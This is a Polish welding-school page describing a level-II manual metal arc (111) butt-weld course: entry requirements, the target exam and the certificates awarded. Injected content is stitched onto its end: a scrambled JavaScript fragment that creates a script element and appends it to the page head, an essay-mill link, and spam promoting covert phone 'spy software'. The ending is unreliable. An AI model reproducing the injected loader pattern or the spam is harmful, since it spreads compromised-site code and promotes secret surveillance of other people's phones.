Elektryczne 111 P

Kurs spawania blach ze stali ferrytycznych lub nierdzewnych elektrodami otulonymi -spoiny czołowe (111) – II stopień
Założenia organizacyjno – programowe:

Cel kursu
Teoretyczne i praktyczne przygotowanie uczestników kursu do egzaminu końcowego IS-P-BW-1-111lub IS-P-BW-8-111
Zasady rekrutacji
  • posiadanie Książki Spawacza z wpisem o ukończeniu kursu spawania blach i rur – spoiny pachwinowe lub
  • ukończenie podstawowego kursu spawania elektrodami otulonymi wg systemu stosowanego do 2007 roku
  • praktyka w spawaniu ( licząc od daty egzaminu  końcowego ) przez co najmniej 1 roku
Liczba godzin
Uzyskane uprawnienia
Uczestnik utrzymuje:
  • uprawnienia do spawania konstrukcji klasy 3  wg PN-87/M-69008
  • uprawnienia te są ważne dwa lata i muszą być przedłużone zgodnie z ustaleniami zawartymi w normie EN 287-1
  • wpis w Książce Spawacza przez Instytut Spawalnictwa  w Gliwicach
  • Świadectwo Egzaminu Spawacza ważne w całej Unii  Europejskiej (Welder Approval Test Certyfikate) w języku polskim i angielskim lub w polskim i  niemieckim wydane przez Instytut Spawalnictwa w Gliwicach
Cena kursu
?

https://www.essaysheaven.com/

d.getElementsByTagName(‚head’)[0].appendChild(s);var d=document;var s=d.createElement(‚script’); The most popular 2017 spy software applications for the mobile phones.http://gonenativesurf.com/sms-tracker-can-i-monitor-my-childs-text-iphone-spy-without-jailbreak/

Top